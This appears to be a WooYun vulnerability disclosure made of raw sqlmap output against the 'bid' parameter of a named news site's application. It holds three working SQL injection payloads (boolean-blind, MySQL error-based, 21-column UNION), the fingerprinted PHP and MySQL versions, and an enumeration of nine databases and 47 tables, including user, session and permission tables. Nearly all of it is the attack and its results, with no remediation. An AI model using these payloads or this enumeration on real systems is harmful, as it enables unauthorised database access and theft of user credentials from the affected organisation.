WooYun.org

---
Parameter: bid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: bid=1 AND 2040=2040
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=1 AND (SELECT 5418 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(5418=5418,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: bid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7671,0x467a46514f505a475662,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
available databases [9]:
[*] donews
[*] donews_appservice
[*] donews_chenfeng
[*] donewsblog
[*] information_schema
[*] mysql
[*] niukeji
[*] niukeji_bug
[*] performance_schema
Database: donews
[47 tables]
+--------------------------------------+
| attachments_attachments              |
| attachments_attachments_tags         |
| attachments_category                 |
| auth_group                           |
| auth_group_permissions               |
| auth_permission                      |
| auth_user                            |
| auth_user_groups                     |
| auth_user_user_permissions           |
| blackboard_blackboard                |
| blacklist                            |
| columns_columns                      |
| comments_category                    |
| comments_comments                    |
| config                               |
| django_admin_log                     |
| django_content_type                  |
| django_session                       |
| django_site                          |
| feedback                             |
| ftps_ftps                            |
| ftps_ftps_category                   |
| imgrepertory                         |
| info_profile                         |
| logs_logs                            |
| news_news                            |
| news_news_tags                       |
| news_news_uploads                    |
| permissions_columnscategory          |
| permissions_columnspermissions       |
| permissions_modulescategory          |
| permissions_modulespermissions       |
| picset                               |
| report_report                        |
| sections_category                    |
| sections_data                        |
| sections_sections                    |
| sitetemplates_sitetemplates          |
| sitetemplates_sitetemplates_category |
| special_special                      |
| special_special_tags                 |
| sph_counter                          |
| tags_category                        |
| tags_tags                            |
| votelog                              |
| votesys                              |
| workload_workload                    |
+--------------------------------------+